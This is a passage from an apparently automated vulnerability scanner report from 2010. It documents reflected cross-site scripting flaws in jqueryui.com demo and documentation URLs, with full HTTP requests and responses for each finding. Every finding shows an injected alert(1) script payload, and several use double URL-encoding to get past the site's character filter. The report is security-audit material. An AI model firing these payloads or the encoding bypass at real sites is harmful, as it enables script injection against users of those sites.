   <title>jQuery UI - RemoveClassa472b</title><script>alert(1)</script>4022b6ec612 Demos & Documentation</title>

   <meta name="keywords" cont
...[SNIP]...

1.33. http://jqueryui.com/demos/resizable [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/resizable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 15aa5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0374a379391 was submitted in the REST URL parameter 2. This input was echoed as 15aa5</title><script>alert(1)</script>0374a379391 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/resizable15aa5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0374a379391 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7894

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Resizable15aa5</title><script>alert(1)</script>0374a379391 Demos & Documentation</title>

   <meta name="keywords" conten
...[SNIP]...

1.34. http://jqueryui.com/demos/selectable [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/selectable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e5947%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e4b0ed442f was submitted in the REST URL parameter 2. This input was echoed as e5947</title><script>alert(1)</script>7e4b0ed442f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/selectablee5947%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e4b0ed442f HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7895

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Selectablee5947</title><script>alert(1)</script>7e4b0ed442f Demos & Documentation</title>

   <meta name="keywords" conte
...[SNIP]...

1.35. http://jqueryui.com/demos/show [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/show

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload cf3be%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac7eb17e92 was submitted in the REST URL parameter 2. This input was echoed as cf3be</title><script>alert(1)</script>ac7eb17e92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/showcf3be%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac7eb17e92 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7888

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Showcf3be</title><script>alert(1)</script>ac7eb17e92 Demos & Documentation</title>

   <meta name="keywords" content="jqu
...[SNIP]...

1.36. http://jqueryui.com/demos/slider [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/slider

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 5c543%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2e60ca751a was submitted in the REST URL parameter 2. This input was echoed as 5c543</title><script>alert(1)</script>d2e60ca751a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/slider5c543%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2e60ca751a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Slider5c543</title><script>alert(1)</script>d2e60ca751a Demos & Documentation</title>

   <meta name="keywords" content="
...[SNIP]...

1.37. http://jqueryui.com/demos/sortable [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/sortable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 48288%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac67e82f056 was submitted in the REST URL parameter 2. This input was echoed as 48288</title><script>alert(1)</script>ac67e82f056 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/sortable48288%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac67e82f056 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7893

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Sortable48288</title><script>alert(1)</script>ac67e82f056 Demos & Documentation</title>

   <meta name="keywords" content
...[SNIP]...

1.38. http://jqueryui.com/demos/switchClass [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/switchClass

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload dce5d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e931194fbe14 was submitted in the REST URL parameter 2. This input was echoed as dce5d</title><script>alert(1)</script>931194fbe14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/switchClassdce5d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e931194fbe14 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7896

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - SwitchClassdce5d</title><script>alert(1)</script>931194fbe14 Demos & Documentation</title>

   <meta name="keywords" cont
...[SNIP]...

1.39. http://jqueryui.com/demos/tabs [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/tabs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 74bf4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66633b53404 was submitted in the REST URL parameter 2. This input was echoed as 74bf4</title><script>alert(1)</script>66633b53404 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/tabs74bf4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66633b53404 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7889

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Tabs74bf4</title><script>alert(1)</script>66633b53404 Demos & Documentation</title>

   <meta name="keywords" content="jq
...[SNIP]...

1.40. http://jqueryui.com/demos/toggle [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/toggle

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload af4d2%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e33cc3da75a1 was submitted in the REST URL parameter 2. This input was echoed as af4d2</title><script>alert(1)</script>33cc3da75a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/toggleaf4d2%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e33cc3da75a1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Toggleaf4d2</title><script>alert(1)</script>33cc3da75a1 Demos & Documentation</title>

   <meta name="keywords" content="
...[SNIP]...

1.41. http://jqueryui.com/demos/toggleClass [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/toggleClass

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a170a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93e94afd858 was submitted in the REST URL parameter 2. This input was echoed as a170a</title><script>alert(1)</script>93e94afd858 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/toggleClassa170a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93e94afd858 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7896

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ToggleClassa170a</title><script>alert(1)</script>93e94afd858 Demos & Documentation</title>

   <meta name="keywords" cont
...[SNIP]...

1.42. http://jqueryui.com/docs/Changelog [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Changelog

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b95db</title><script>alert(1)</script>2018b300e22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Changelogb95db</title><script>alert(1)</script>2018b300e22 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27144

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Changelogb95db</title><script>alert(1)</script>2018b300e22</title>

   <meta name="keywords" content="jquer
...[SNIP]...

1.43. http://jqueryui.com/docs/Changelog [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Changelog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6be57</script><script>alert(1)</script>60168f40aba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Changelog6be57</script><script>alert(1)</script>60168f40aba HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27147

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Changelog6be57</script><script>alert(1)</script>60168f40aba</title>

   <meta name="keywords" content="jque
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Changelog6be57</script><script>alert(1)</script>60168f40aba]").addClass("selected");
</script>
...[SNIP]...

1.44. http://jqueryui.com/docs/Developer_Guide [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Developer_Guide

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 58f62</title><script>alert(1)</script>bebe32d69ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Developer_Guide58f62</title><script>alert(1)</script>bebe32d69ac HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27162

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Developer_Guide58f62</title><script>alert(1)</script>bebe32d69ac</title>

   <meta name="keywords" content=
...[SNIP]...

1.45. http://jqueryui.com/docs/Developer_Guide [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Developer_Guide

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fc30</script><script>alert(1)</script>a118870322d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Developer_Guide3fc30</script><script>alert(1)</script>a118870322d HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27165

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Developer_Guide3fc30</script><script>alert(1)</script>a118870322d</title>

   <meta name="keywords" content
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Developer_Guide3fc30</script><script>alert(1)</script>a118870322d]").addClass("selected");
</script>
...[SNIP]...

1.46. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Effects/Methods

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1c2e3</title><script>alert(1)</script>2d0e0645d25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Effects1c2e3</title><script>alert(1)</script>2d0e0645d25/Methods HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27162

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Effects1c2e3</title><script>alert(1)</script>2d0e0645d25/Methods</title>

   <meta name="keywords" content=
...[SNIP]...

1.47. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Effects/Methods

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 763bb</script><script>alert(1)</script>c92f51aa55a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Effects763bb</script><script>alert(1)</script>c92f51aa55a/Methods HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27165

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Effects763bb</script><script>alert(1)</script>c92f51aa55a/Methods</title>

   <meta name="keywords" content
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Effects763bb</script><script>alert(1)</script>c92f51aa55a/Methods]").addClass("selected");
</script>
...[SNIP]...

1.48. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Effects/Methods

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload df68a</title><script>alert(1)</script>cbd839e45c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Effects/Methodsdf68a</title><script>alert(1)</script>cbd839e45c8 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27162

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Effects/Methodsdf68a</title><script>alert(1)</script>cbd839e45c8</title>

   <meta name="keywords" content=
...[SNIP]...

1.49. http://jqueryui.com/docs/Effects/Methods [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Effects/Methods

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 727f2</script><script>alert(1)</script>fb56f9f5163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Effects/Methods727f2</script><script>alert(1)</script>fb56f9f5163 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27165

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Effects/Methods727f2</script><script>alert(1)</script>fb56f9f5163</title>

   <meta name="keywords" content
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Effects/Methods727f2</script><script>alert(1)</script>fb56f9f5163]").addClass("selected");
</script>
...[SNIP]...

1.50. http://jqueryui.com/docs/Getting_Started [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Getting_Started

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c05c</script><script>alert(1)</script>f4216eaa9ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Getting_Started2c05c</script><script>alert(1)</script>f4216eaa9ea HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27165

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Getting_Started2c05c</script><script>alert(1)</script>f4216eaa9ea</title>

   <meta name="keywords" content
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Getting_Started2c05c</script><script>alert(1)</script>f4216eaa9ea]").addClass("selected");
</script>
...[SNIP]...

1.51. http://jqueryui.com/docs/Getting_Started [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Getting_Started

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload ed1f2</title><script>alert(1)</script>4e14f46f97e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Getting_Starteded1f2</title><script>alert(1)</script>4e14f46f97e HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27162

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Getting_Starteded1f2</title><script>alert(1)</script>4e14f46f97e</title>

   <meta name="keywords" content=
...[SNIP]...

1.52. http://jqueryui.com/docs/Git [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Git

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b27</script><script>alert(1)</script>acb8bbcb22c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

